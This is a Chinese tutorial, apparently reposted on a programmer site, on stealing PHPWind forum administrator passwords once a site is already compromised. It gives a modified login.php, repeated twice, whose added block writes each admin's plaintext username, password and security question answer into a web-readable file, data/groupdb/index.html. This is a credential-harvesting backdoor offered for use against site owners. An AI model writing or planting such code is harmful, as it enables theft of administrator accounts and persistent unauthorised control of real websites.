教你用PHPWIND得到管理员密码的方法
程序员文章站
2022-03-16 16:47:28
有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?
在登录文件做手脚啊...我来贴一个我修改的.
login.php里面替换掉对应的部分就OK了.
[Copy to clipboard] [ ... 08-10-08...
有站的权限,但是管理员密码很复杂,md5暴不出来,想得到他密码咋办?
在登录文件做手脚啊...我来贴一个我修改的.
login.php里面替换掉对应的部分就ok了. [copy to clipboard] [ - ]code:
if($action=="login"){
/*记录他的问题和答案修改开始*/
$ques=($_post['question']!=='-1') ? $_post['question'] : $_post['customquest'];
$qs='问题:'.$ques.'答案:'.$_post['answer'];
/*记录他的问题和答案修改结束*/
if(!$_post['step']){
$jumpurl = $pre_url;
require_once(r_p.'require/header.php');
require_once printeot('login');footer();
} elseif($_post['step']==2){
$logingd && gdconfirm($_post['gdcode']);
$loginq && qcheck($_post['qanswer'],$_post['qkey']); require_once(r_p.'require/checkpass.php');
include_once(d_p."data/bbscache/dbreg.php");
initgp(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'p');
if ($pwuser && $pwpwd)
{
$md5_pwpwd = md5($pwpwd);
$realpass=$pwpwd;
$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
/*下面是我添加的*/
$adminid = array("3", "4", "5"); //adminid=3,4,5,就是管理者.
if (in_array($groupid, $adminid)){
$showtime=date("y-m-d h:i:s"); //记录的时间.
@$fp = fopen(d_p.'./data/groupdb/index.html', 'a'); //写入到原本就存在的文件,而且这个文件应该是可写的.
@fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-groupid:'.$groupid.'-'.$showtime.'<br>'); //基本格式
@fclose($fp);
}
/*到这里修改结束*/
}else{
showmsg('login_empty');
}
if(file_exists(d_p."data/groupdb/group_$groupid.php")){
require_once pcv(d_p."data/groupdb/group_$groupid.php");
} else{
require_once(d_p."data/groupdb/group_1.php");
}
$windpwd = $pwpwd;
$cktime != 0 && $cktime = $timestamp;
cookie("winduser",strcode($winduid."\t".$windpwd."\t".$safecv),$cktime);
cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中
if($db_autoban){
require_once(r_p.'require/autoban.php');
autoban($winduid);
}
($gp_allowhide && $hideid) ? cookie('hideid',"1",$cktime) : loginipwrite($winduid);
empty($jumpurl) && $jumpurl=$db_bfn;
//passport
if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
$tmp = $jumpurl;
$jumpurl = $forward ? $forward : $db_ppturls;
$forward = $tmp;
require_once(r_p.'require/passport_server.php');
}
//passport
refreshto($jumpurl,'have_login');
}
}
在登录文件做手脚啊...我来贴一个我修改的.
login.php里面替换掉对应的部分就ok了. [copy to clipboard] [ - ]code:
if($action=="login"){
/*记录他的问题和答案修改开始*/
$ques=($_post['question']!=='-1') ? $_post['question'] : $_post['customquest'];
$qs='问题:'.$ques.'答案:'.$_post['answer'];
/*记录他的问题和答案修改结束*/
if(!$_post['step']){
$jumpurl = $pre_url;
require_once(r_p.'require/header.php');
require_once printeot('login');footer();
} elseif($_post['step']==2){
$logingd && gdconfirm($_post['gdcode']);
$loginq && qcheck($_post['qanswer'],$_post['qkey']); require_once(r_p.'require/checkpass.php');
include_once(d_p."data/bbscache/dbreg.php");
initgp(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'p');
if ($pwuser && $pwpwd)
{
$md5_pwpwd = md5($pwpwd);
$realpass=$pwpwd;
$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
/*下面是我添加的*/
$adminid = array("3", "4", "5"); //adminid=3,4,5,就是管理者.
if (in_array($groupid, $adminid)){
$showtime=date("y-m-d h:i:s"); //记录的时间.
@$fp = fopen(d_p.'./data/groupdb/index.html', 'a'); //写入到原本就存在的文件,而且这个文件应该是可写的.
@fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-groupid:'.$groupid.'-'.$showtime.'<br>'); //基本格式
@fclose($fp);
}
/*到这里修改结束*/
}else{
showmsg('login_empty');
}
if(file_exists(d_p."data/groupdb/group_$groupid.php")){
require_once pcv(d_p."data/groupdb/group_$groupid.php");
} else{
require_once(d_p."data/groupdb/group_1.php");
}
$windpwd = $pwpwd;
$cktime != 0 && $cktime = $timestamp;
cookie("winduser",strcode($winduid."\t".$windpwd."\t".$safecv),$cktime);
cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中
if($db_autoban){
require_once(r_p.'require/autoban.php');
autoban($winduid);
}
($gp_allowhide && $hideid) ? cookie('hideid',"1",$cktime) : loginipwrite($winduid);
empty($jumpurl) && $jumpurl=$db_bfn;
//passport
if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
$tmp = $jumpurl;
$jumpurl = $forward ? $forward : $db_ppturls;
$forward = $tmp;
require_once(r_p.'require/passport_server.php');
}
//passport
refreshto($jumpurl,'have_login');
}
}